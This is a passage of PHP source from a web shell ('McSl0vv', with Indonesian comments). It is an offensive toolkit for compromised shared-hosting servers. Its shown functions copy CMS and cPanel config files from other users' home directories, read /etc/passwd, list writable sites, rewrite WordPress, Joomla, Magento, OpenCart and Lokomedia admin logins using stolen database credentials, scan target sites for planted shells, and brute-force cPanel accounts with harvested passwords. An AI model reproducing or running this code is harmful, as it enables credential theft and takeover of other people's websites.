  2777. "/home2/$user_ibh/public_html/BETA/wp-config.php" => "WordPressBeta",
  2778. "/home2/$user_ibh/public_html/PRESS/wp-config.php" => "WordPressPress",
  2779. "/home2/$user_ibh/public_html/Press/wp-config.php" => "WordPressPress",
  2780. "/home2/$user_ibh/public_html/press/wp-config.php" => "WordPressPress",
  2781. "/home2/$user_ibh/public_html/Wp/wp-config.php" => "WordPressWp",
  2782. "/home2/$user_ibh/public_html/wp/wp-config.php" => "WordPressWp",
  2783. "/home2/$user_ibh/public_html/WP/wp-config.php" => "WordPressWP",
  2784. "/home2/$user_ibh/public_html/portal/wp-config.php" => "WordPressPortal",
  2785. "/home2/$user_ibh/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  2786. "/home2/$user_ibh/public_html/Portal/wp-config.php" => "WordPressPortal",
  2787. "/home3/$user_ibh/.my.cnf" => "cpanel",
  2788. "/home3/$user_ibh/.accesshash" => "WHM-accesshash",
  2789. "/home3/$user_ibh/public_html/bw-configs/config.ini" => "BosWeb",
  2790. "/home3/$user_ibh/public_html/config/koneksi.php" => "Lokomedia",
  2791. "/home3/$user_ibh/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  2792. "/home3/$user_ibh/public_html/clientarea/configuration.php" => "WHMCS",
  2793. "/home3/$user_ibh/public_html/whmcs/configuration.php" => "WHMCS",
  2794. "/home3/$user_ibh/public_html/forum/config.php" => "phpBB",
  2795. "/home3/$user_ibh/public_html/sites/default/settings.php" => "Drupal",
  2796. "/home3/$user_ibh/public_html/config/settings.inc.php" => "PrestaShop",
  2797. "/home3/$user_ibh/public_html/app/etc/local.xml" => "Magento",
  2798. "/home3/$user_ibh/public_html/admin/config.php" => "OpenCart",
  2799. "/home3/$user_ibh/public_html/slconfig.php" => "Sitelok",
  2800. "/home3/$user_ibh/public_html/application/config/database.php" => "Ellislab",
  2801. "/home3/$user_ibh/public_html/whm/configuration.php" => "WHMCS",
  2802. "/home3/$user_ibh/public_html/whmc/WHM/configuration.ph" => "WHMC",
  2803. "/home3/$user_ibh/public_html/central/configuration.php" => "WHM Central",
  2804. "/home3/$user_ibh/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  2805. "/home3/$user_ibh/public_html/whm/whmcs/configuration.php" => "WHMCS",
  2806. "/home3/$user_ibh/public_html/submitticket.php" => "WHMCS",
  2807. "/home3/$user_ibh/public_html/configuration.php" => "Joomla",
  2808. "/home3/$user_ibh/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  2809. "/home3/$user_ibh/public_html/joomla/configuration.php" => "JoomlaJoomla",
  2810. "/home3/$user_ibh/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",
  2811. "/home3/$user_ibh/public_html/Home/configuration.php" => "JoomlaHome",
  2812. "/home3/$user_ibh/public_html/HOME/configuration.php" => "JoomlaHome",
  2813. "/home3/$user_ibh/public_html/home/configuration.php" => "JoomlaHome",
  2814. "/home3/$user_ibh/public_html/NEW/configuration.php" => "JoomlaNew",
  2815. "/home3/$user_ibh/public_html/New/configuration.php" => "JoomlaNew",
  2816. "/home3/$user_ibh/public_html/new/configuration.php" => "JoomlaNew",
  2817. "/home3/$user_ibh/public_html/News/configuration.php" => "JoomlaNews",
  2818. "/home3/$user_ibh/public_html/NEWS/configuration.php" => "JoomlaNews",
  2819. "/home3/$user_ibh/public_html/news/configuration.php" => "JoomlaNews",
  2820. "/home3/$user_ibh/public_html/Cms/configuration.php" => "JoomlaCms",
  2821. "/home3/$user_ibh/public_html/CMS/configuration.php" => "JoomlaCms",
  2822. "/home3/$user_ibh/public_html/cms/configuration.php" => "JoomlaCms",
  2823. "/home3/$user_ibh/public_html/Main/configuration.php" => "JoomlaMain",
  2824. "/home3/$user_ibh/public_html/MAIN/configuration.php" => "JoomlaMain",
  2825. "/home3/$user_ibh/public_html/main/configuration.php" => "JoomlaMain",
  2826. "/home3/$user_ibh/public_html/Blog/configuration.php" => "JoomlaBlog",
  2827. "/home3/$user_ibh/public_html/BLOG/configuration.php" => "JoomlaBlog",
  2828. "/home3/$user_ibh/public_html/blog/configuration.php" => "JoomlaBlog",
  2829. "/home3/$user_ibh/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  2830. "/home3/$user_ibh/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  2831. "/home3/$user_ibh/public_html/blogs/configuration.php" => "JoomlaBlogs",
  2832. "/home3/$user_ibh/public_html/beta/configuration.php" => "JoomlaBeta",
  2833. "/home3/$user_ibh/public_html/Beta/configuration.php" => "JoomlaBeta",
  2834. "/home3/$user_ibh/public_html/BETA/configuration.php" => "JoomlaBeta",
  2835. "/home3/$user_ibh/public_html/PRESS/configuration.php" => "JoomlaPress",
  2836. "/home3/$user_ibh/public_html/Press/configuration.php" => "JoomlaPress",
  2837. "/home3/$user_ibh/public_html/press/configuration.php" => "JoomlaPress",
  2838. "/home3/$user_ibh/public_html/Wp/configuration.php" => "JoomlaWp",
  2839. "/home3/$user_ibh/public_html/wp/configuration.php" => "JoomlaWp",
  2840. "/home3/$user_ibh/public_html/WP/configuration.php" => "JoomlaWP",
  2841. "/home3/$user_ibh/public_html/portal/configuration.php" => "JoomlaPortal",
  2842. "/home3/$user_ibh/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  2843. "/home3/$user_ibh/public_html/Portal/configuration.php" => "JoomlaPortal",
  2844. "/home3/$user_ibh/public_html/wp-config.php" => "WordPress",
  2845. "/home3/$user_ibh/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  2846. "/home3/$user_ibh/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  2847. "/home3/$user_ibh/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",
  2848. "/home3/$user_ibh/public_html/Home/wp-config.php" => "WordPressHome",
  2849. "/home3/$user_ibh/public_html/HOME/wp-config.php" => "WordPressHome",
  2850. "/home3/$user_ibh/public_html/home/wp-config.php" => "WordPressHome",
  2851. "/home3/$user_ibh/public_html/NEW/wp-config.php" => "WordPressNew",
  2852. "/home3/$user_ibh/public_html/New/wp-config.php" => "WordPressNew",
  2853. "/home3/$user_ibh/public_html/new/wp-config.php" => "WordPressNew",
  2854. "/home3/$user_ibh/public_html/News/wp-config.php" => "WordPressNews",
  2855. "/home3/$user_ibh/public_html/NEWS/wp-config.php" => "WordPressNews",
  2856. "/home3/$user_ibh/public_html/news/wp-config.php" => "WordPressNews",
  2857. "/home3/$user_ibh/public_html/Cms/wp-config.php" => "WordPressCms",
  2858. "/home3/$user_ibh/public_html/CMS/wp-config.php" => "WordPressCms",
  2859. "/home3/$user_ibh/public_html/cms/wp-config.php" => "WordPressCms",
  2860. "/home3/$user_ibh/public_html/Main/wp-config.php" => "WordPressMain",
  2861. "/home3/$user_ibh/public_html/MAIN/wp-config.php" => "WordPressMain",
  2862. "/home3/$user_ibh/public_html/main/wp-config.php" => "WordPressMain",
  2863. "/home3/$user_ibh/public_html/Blog/wp-config.php" => "WordPressBlog",
  2864. "/home3/$user_ibh/public_html/BLOG/wp-config.php" => "WordPressBlog",
  2865. "/home3/$user_ibh/public_html/blog/wp-config.php" => "WordPressBlog",
  2866. "/home3/$user_ibh/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  2867. "/home3/$user_ibh/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  2868. "/home3/$user_ibh/public_html/blogs/wp-config.php" => "WordPressBlogs",
  2869. "/home3/$user_ibh/public_html/beta/wp-config.php" => "WordPressBeta",
  2870. "/home3/$user_ibh/public_html/Beta/wp-config.php" => "WordPressBeta",
  2871. "/home3/$user_ibh/public_html/BETA/wp-config.php" => "WordPressBeta",
  2872. "/home3/$user_ibh/public_html/PRESS/wp-config.php" => "WordPressPress",
  2873. "/home3/$user_ibh/public_html/Press/wp-config.php" => "WordPressPress",
  2874. "/home3/$user_ibh/public_html/press/wp-config.php" => "WordPressPress",
  2875. "/home3/$user_ibh/public_html/Wp/wp-config.php" => "WordPressWp",
  2876. "/home3/$user_ibh/public_html/wp/wp-config.php" => "WordPressWp",
  2877. "/home3/$user_ibh/public_html/WP/wp-config.php" => "WordPressWP",
  2878. "/home3/$user_ibh/public_html/portal/wp-config.php" => "WordPressPortal",
  2879. "/home3/$user_ibh/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  2880. "/home3/$user_ibh/public_html/Portal/wp-config.php" => "WordPressPortal"
  2881. );
  2882. foreach($grab_config as $config => $nama_config) {
  2883. $ambil_config = file_get_contents($config);
  2884. if($ambil_config == '') {
  2885. } else {
  2886. $file_config = fopen("McSl0vv_Config/$user_ibh-$nama_config.txt","w");
  2887. fputs($file_config,$ambil_config);
  2888. }
  2889. }
  2890. }
  2891. }
  2892. echo "<center><a href='?McSl0vv=$McSl0vv/McSl0vv_Config'><font color=lime>Done</font></a></center>";
  2893. }else{
  2894.  
  2895. echo "<form method=\"post\" action=\"\"><center>etc/passw ( Error ? <a href='?McSl0vv=$McSl0vv&ikiw=passwbypass'>Bypass Here</a> )<br><textarea name=\"passwd\" class='area' rows='15' cols='60'>\n";
  2896. echo file_get_contents('/etc/passwd');
  2897. echo "</textarea><br><input type=\"submit\" value=\"GassPoll\"></td></tr></center>\n";
  2898. }
  2899. } elseif($_GET['ikiw'] == 'jumping') {
  2900. $i = 0;
  2901. echo "<pre><div class='margin: 5px auto;'>";
  2902. $etc = fopen("/etc/passwd", "r");
  2903. while($passwd = fgets($etc)) {
  2904. if($passwd == '' || !$etc) {
  2905. echo "<font color=red>Gagal Membaca /etc/passwd</font>";
  2906. } else {
  2907. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  2908. foreach($user_jumping[1] as $user_idx_jump) {
  2909. $user_jumping_dir = "/home/$user_idx_jump/public_html";
  2910. if(is_readable($user_jumping_dir)) {
  2911. $i++;
  2912. $jrw = "[<font color=lime>R</font>] <a href='?McSl0vv=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a><br>";
  2913. if(is_writable($user_jumping_dir)) {
  2914. $jrw = "[<font color=lime>RW</font>] <a href='?McSl0vv=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a><br>";
  2915. }
  2916. echo $jrw;
  2917. $domain_jump = file_get_contents("/etc/named.conf");
  2918. if($domain_jump == '') {
  2919. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  2920. } else {
  2921. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  2922. foreach($domains_jump[1] as $dj) {
  2923. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  2924. $user_jumping_url = $user_jumping_url['name'];
  2925. if($user_jumping_url == $user_idx_jump) {
  2926. echo " => ( <u>$dj</u> )<br>";
  2927. break;
  2928. }
  2929. }
  2930. }
  2931. }
  2932. }
  2933. }
  2934. }
  2935. if($i == 0) {
  2936. } else {
  2937. echo "<br>Total ada ".$i." Kimcil di ".gethostbyname($_SERVER['HTTP_HOST'])."";
  2938. }
  2939. echo "</div></pre>";
  2940. } elseif($_GET['ikiw'] == 'auto_edit_user') {
  2941. if($_POST['hajar']) {
  2942. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  2943. echo "username atau password harus lebih dari 6 karakter";
  2944. } else {
  2945. $user_baru = $_POST['user_baru'];
  2946. $pass_baru = md5($_POST['pass_baru']);
  2947. $conf = $_POST['config_dir'];
  2948. $scan_conf = scandir($conf);
  2949. foreach($scan_conf as $file_conf) {
  2950. if(!is_file("$conf/$file_conf")) continue;
  2951. $config = file_get_contents("$conf/$file_conf");
  2952. if(preg_match("/JConfig|joomla/",$config)) {
  2953. $dbhost = ambilkata($config,"host = '","'");
  2954. $dbuser = ambilkata($config,"user = '","'");
  2955. $dbpass = ambilkata($config,"password = '","'");
  2956. $dbname = ambilkata($config,"db = '","'");
  2957. $dbprefix = ambilkata($config,"dbprefix = '","'");
  2958. $prefix = $dbprefix."users";
  2959. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2960. $db = mysql_select_db($dbname);
  2961. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2962. $result = mysql_fetch_array($q);
  2963. $id = $result['id'];
  2964. $site = ambilkata($config,"sitename = '","'");
  2965. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  2966. echo "Config => ".$file_conf."<br>";
  2967. echo "CMS => Joomla<br>";
  2968. if($site == '') {
  2969. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  2970. } else {
  2971. echo "Sitename => $site<br>";
  2972. }
  2973. if(!$update OR !$conn OR !$db) {
  2974. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2975. } else {
  2976. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2977. }
  2978. mysql_close($conn);
  2979. } elseif(preg_match("/WordPress/",$config)) {
  2980. $dbhost = ambilkata($config,"DB_HOST', '","'");
  2981. $dbuser = ambilkata($config,"DB_USER', '","'");
  2982. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  2983. $dbname = ambilkata($config,"DB_NAME', '","'");
  2984. $dbprefix = ambilkata($config,"table_prefix = '","'");
  2985. $prefix = $dbprefix."users";
  2986. $option = $dbprefix."options";
  2987. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2988. $db = mysql_select_db($dbname);
  2989. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2990. $result = mysql_fetch_array($q);
  2991. $id = $result[ID];
  2992. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  2993. $result2 = mysql_fetch_array($q2);
  2994. $target = $result2[option_value];
  2995. if($target == '') {
  2996. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2997. } else {
  2998. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  2999. }
  3000. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  3001. echo "Config => ".$file_conf."<br>";
  3002. echo "CMS => Wordpress<br>";
  3003. echo $url_target;
  3004. if(!$update OR !$conn OR !$db) {
  3005. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3006. } else {
  3007. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3008. }
  3009. mysql_close($conn);
  3010. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  3011. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  3012. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  3013. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  3014. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  3015. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  3016. $prefix = $dbprefix."admin_user";
  3017. $option = $dbprefix."core_config_data";
  3018. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3019. $db = mysql_select_db($dbname);
  3020. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  3021. $result = mysql_fetch_array($q);
  3022. $id = $result[user_id];
  3023. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  3024. $result2 = mysql_fetch_array($q2);
  3025. $target = $result2[value];
  3026. if($target == '') {
  3027. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3028. } else {
  3029. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  3030. }
  3031. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  3032. echo "Config => ".$file_conf."<br>";
  3033. echo "CMS => Magento<br>";
  3034. echo $url_target;
  3035. if(!$update OR !$conn OR !$db) {
  3036. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3037. } else {
  3038. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3039. }
  3040. mysql_close($conn);
  3041. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  3042. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  3043. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  3044. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  3045. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  3046. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  3047. $prefix = $dbprefix."user";
  3048. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3049. $db = mysql_select_db($dbname);
  3050. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  3051. $result = mysql_fetch_array($q);
  3052. $id = $result[user_id];
  3053. $target = ambilkata($config,"HTTP_SERVER', '","'");
  3054. if($target == '') {
  3055. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3056. } else {
  3057. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  3058. }
  3059. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  3060. echo "Config => ".$file_conf."<br>";
  3061. echo "CMS => OpenCart<br>";
  3062. echo $url_target;
  3063. if(!$update OR !$conn OR !$db) {
  3064. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3065. } else {
  3066. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3067. }
  3068. mysql_close($conn);
  3069. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  3070. $dbhost = ambilkata($config,'server = "','"');
  3071. $dbuser = ambilkata($config,'username = "','"');
  3072. $dbpass = ambilkata($config,'password = "','"');
  3073. $dbname = ambilkata($config,'database = "','"');
  3074. $prefix = "users";
  3075. $option = "identitas";
  3076. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3077. $db = mysql_select_db($dbname);
  3078. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  3079. $result = mysql_fetch_array($q);
  3080. $target = $result[alamat_website];
  3081. if($target == '') {
  3082. $target2 = $result[url];
  3083. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3084. if($target2 == '') {
  3085. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3086. } else {
  3087. $cek_login3 = file_get_contents("$target2/adminweb/");
  3088. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  3089. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  3090. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  3091. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  3092. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  3093. } else {
  3094. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  3095. }
  3096. }
  3097. } else {
  3098. $cek_login = file_get_contents("$target/adminweb/");
  3099. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  3100. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  3101. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  3102. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  3103. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  3104. } else {
  3105. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  3106. }
  3107. }
  3108. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  3109. echo "Config => ".$file_conf."<br>";
  3110. echo "CMS => Lokomedia<br>";
  3111. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  3112. echo $url_target2;
  3113. } else {
  3114. echo $url_target;
  3115. }
  3116. if(!$update OR !$conn OR !$db) {
  3117. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3118. } else {
  3119. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3120. }
  3121. mysql_close($conn);
  3122. }
  3123. }
  3124. }
  3125. } else {
  3126. echo "<center>
  3127. <h1>Auto Edit User Config</h1>
  3128. <form method='post'>
  3129. DIR Config: <br>
  3130. <input type='text' size='50' name='config_dir' value='$McSl0vv'><br><br>
  3131. Set User & Pass: <br>
  3132. <input type='text' name='user_baru' value='McSl0vv' placeholder='user_baru'><br>
  3133. <input type='text' name='pass_baru' value='McSl0vv' placeholder='pass_baru'><br>
  3134. <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
  3135. </form>
  3136. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  3137. ";
  3138. }
  3139. }elseif($_GET['ikiw'] == 'shelscan') {
  3140. echo'<center><h2>Shell Finder</h2>
  3141. <form action="" method="post">
  3142. <input type="text" size="50" name="traget" value="http://www.site.com/"/>
  3143. <br>
  3144. <input name="scan" value="Start Scaning" style="width: 215px;" type="submit">
  3145. </form><br>';
  3146. if (isset($_POST["scan"])) {
  3147. $url = $_POST['traget'];
  3148. echo "<br /><span class='start'>Scanning ".$url."<br /><br /></span>";
  3149. echo "Result :<br />";
  3150. $shells = array("WSO.php","dz.php","cpanel.php","cpn.php","sql.php","mysql.php","madspot.php","cp.php","cpbt.php","sYm.php",
  3151. "x.php","r99.php","lol.php","jo.php","wp.php","whmcs.php","shellz.php","d0main.php","d0mains.php","users.php",
  3152. "Cgishell.pl","killer.php","changeall.php","2.php","Sh3ll.php","dz0.php","dam.php","user.php","dom.php","whmcs.php",
  3153. "vb.zip","r00t.php","c99.php","gaza.php","1.php","wp.zip"."wp-content/plugins/disqus-comment-system/disqus.php",
  3154. "d0mains.php","wp-content/plugins/akismet/akismet.php","madspotshell.php","Sym.php","c22.php","c100.php",
  3155. "wp-content/plugins/akismet/admin.php#","wp-content/plugins/google-sitemap-generator/sitemap-core.php#",
  3156. "wp-content/plugins/akismet/widget.php#","Cpanel.php","zone-h.php","tmp/user.php","tmp/Sym.php","cp.php",
  3157. "tmp/madspotshell.php","tmp/root.php","tmp/whmcs.php","tmp/index.php","tmp/2.php","tmp/dz.php","tmp/cpn.php",
  3158. "tmp/changeall.php","tmp/Cgishell.pl","tmp/sql.php","tmp/admin.php","cliente/downloads/h4xor.php",
  3159. "whmcs/downloads/dz.php","L3b.php","d.php","tmp/d.php","tmp/L3b.php","wp-content/plugins/akismet/admin.php",
  3160. "templates/rhuk_milkyway/index.php","templates/beez/index.php","admin1.php","upload.php","up.php","vb.zip","vb.rar",
  3161. "admin2.asp","uploads.php","sa.php","sysadmins/","admin1/","administration/Sym.php","images/Sym.php",
  3162. "/r57.php","/wp-content/plugins/disqus-comment-system/disqus.php","/shell.php","/sa.php","/admin.php",
  3163. "/sa2.php","/2.php","/gaza.php","/up.php","/upload.php","/uploads.php","/templates/beez/index.php","shell.php","/amad.php",
  3164. "/t00.php","/dz.php","/site.rar","/Black.php","/site.tar.gz","/home.zip","/home.rar","/home.tar","/home.tar.gz",
  3165. "/forum.zip","/forum.rar","/forum.tar","/forum.tar.gz","/test.txt","/ftp.txt","/user.txt","/site.txt","/error_log","/error",
  3166. "/cpanel","/awstats","/site.sql","/vb.sql","/forum.sql","/backup.sql","/back.sql","/data.sql","wp.rar/",
  3167. "wp-content/plugins/disqus-comment-system/disqus.php","asp.aspx","/templates/beez/index.php","tmp/vaga.php",
  3168. "tmp/killer.php","whmcs.php","tmp/killer.php","tmp/domaine.pl","tmp/domaine.php","useradmin/",
  3169. "tmp/d0maine.php","d0maine.php","tmp/sql.php","tmp/dz1.php","dz1.php","forum.zip","Symlink.php","Symlink.pl",
  3170. "forum.rar","joomla.zip","joomla.rar","wp.php","buck.sql","sysadmin.php","images/c99.php", "xd.php", "c100.php",
  3171. "spy.aspx","xd.php","tmp/xd.php","sym/root/home/","billing/killer.php","tmp/upload.php","tmp/admin.php",
  3172. "Server.php","tmp/uploads.php","tmp/up.php","Server/","wp-admin/c99.php","tmp/priv8.php","priv8.php","cgi.pl/",
  3173. "tmp/cgi.pl","downloads/dom.php","templates/ja-helio-farsi/index.php","webadmin.html","admins.php",
  3174. "/wp-content/plugins/count-per-day/js/yc/d00.php", "admins/","admins.asp","admins.php","wp.zip","wso2.5.1","pasir.php","pasir2.php","up.php","cok.php","newfile.php","upl.php",".php","a.php","crot.php","kontol.php","hmei7.php","jembut.php","memek.php","tai.php","rabit.php","indoxploit.php","a.php","hemb.php","hack.php","galau.php","HsH.php","indoXploit.php","asu.php","wso.php","lol.php","idx.php","rabbit.php","1n73ction.php","k.php","mailer.php","mail.php","temp.php","c.php","d.php","IDB.php","indo.php","indonesia.php","semvak.php","ndasmu.php","cox.php","as.php","ad.php","aa.php","file.php","peju.php","asd.php","configs.php","ass.php","z.php");
  3175. foreach ($shells as $shell){
  3176. $headers = get_headers("$url$shell"); //
  3177. if (eregi('200', $headers[0])) {
  3178. echo "<a href='$url$shell'>$url$shell</a> <span class='found'>Done :D</span><br /><br/><br/>"; //
  3179. $dz = fopen('shells.txt', 'a+');
  3180. $suck = "$url$shell";
  3181. fwrite($dz, $suck."\n");
  3182. }
  3183. }
  3184. echo "Shell [ <a href='./shells.txt' target='_blank'>shells.txt</a> ]</span>";
  3185. }
  3186.  
  3187. }
  3188. elseif($_GET['ikiw'] == 'cpanel') {
  3189. if($_POST['crack']) {
  3190. $usercp = explode("\r\n", $_POST['user_cp']);
  3191. $passcp = explode("\r\n", $_POST['pass_cp']);
  3192. $i = 0;
  3193. foreach($usercp as $ucp) {
  3194. foreach($passcp as $pcp) {
  3195. if(@mysql_connect('localhost', $ucp, $pcp)) {
  3196. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  3197. } else {
  3198. $_SESSION[$ucp] = "1";
  3199. $_SESSION[$pcp] = "1";
  3200. $i++;
  3201. echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  3202. }
  3203. }
  3204. }
  3205. }
  3206. if($i == 0) {
  3207. } else {
  3208. echo "<br>Nemu ".$i." Cpanel by <font color=lime>Mc'Sl0vv</font>";
  3209. }
  3210. } else {
  3211. echo "<center>
  3212. <form method='post'>
  3213. USER: <br>
  3214. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  3215. $_usercp = fopen("/etc/passwd","r");
  3216. while($getu = fgets($_usercp)) {
  3217. if($getu == '' || !$_usercp) {
  3218. echo "<font color=red>Gagal Membaca /etc/passwd</font>";
  3219. } else {
  3220. preg_match_all("/(.*?):x:/", $getu, $u);
  3221. foreach($u[1] as $user_cp) {
  3222. if(is_dir("/home/$user_cp/public_html")) {
  3223. echo "$user_cp\n";
  3224. }
  3225. }
  3226. }
  3227. }
  3228. echo "</textarea><br>
  3229. PASS: <br>
  3230. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  3231. function cp_pass($McSl0vv) {
  3232. $pass = "";
  3233. $McSl0vva = scandir($McSl0vv);
  3234. foreach($McSl0vva as $McSl0vvb) {
  3235. if(!is_file("$McSl0vv/$McSl0vvb")) continue;
  3236. $ambil = file_get_contents("$McSl0vv/$McSl0vvb");
  3237. if(preg_match("/WordPress/", $ambil)) {
  3238. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  3239. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  3240. $pass .= ambilkata($ambil,"password = '","'")."\n";
  3241. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  3242. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  3243. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  3244. $pass .= ambilkata($ambil,'password = "','"')."\n";
  3245. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  3246. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  3247. } elseif(preg_match("/client/", $ambil)) {
  3248. preg_match("/password=(.*)/", $ambil, $pass1);
  3249. if(preg_match('/"/', $pass1[1])) {
  3250. $pass1[1] = str_replace('"', "", $pass1[1]);
  3251. $pass .= $pass1[1]."\n";
  3252. }
  3253. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  3254. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  3255. }
  3256. }
  3257. echo $pass;
  3258. }
  3259. $cp_pass = cp_pass($McSl0vv);
  3260. echo $cp_pass;
  3261. echo "</textarea><br>
  3262. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  3263. </form>
  3264. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  3265. }
  3266. } elseif($_GET['ikiw'] == 'smtp') {
  3267. echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  3268. function scj($McSl0vv) {
  3269. $McSl0vva = scandir($McSl0vv);
  3270. foreach($McSl0vva as $McSl0vvb) {
  3271. if(!is_file("$McSl0vv/$McSl0vvb")) continue;
  3272. $ambil = file_get_contents("$McSl0vv/$McSl0vvb");
  3273. $ambil = str_replace("$", "", $ambil);
  3274. if(preg_match("/JConfig|joomla/", $ambil)) {
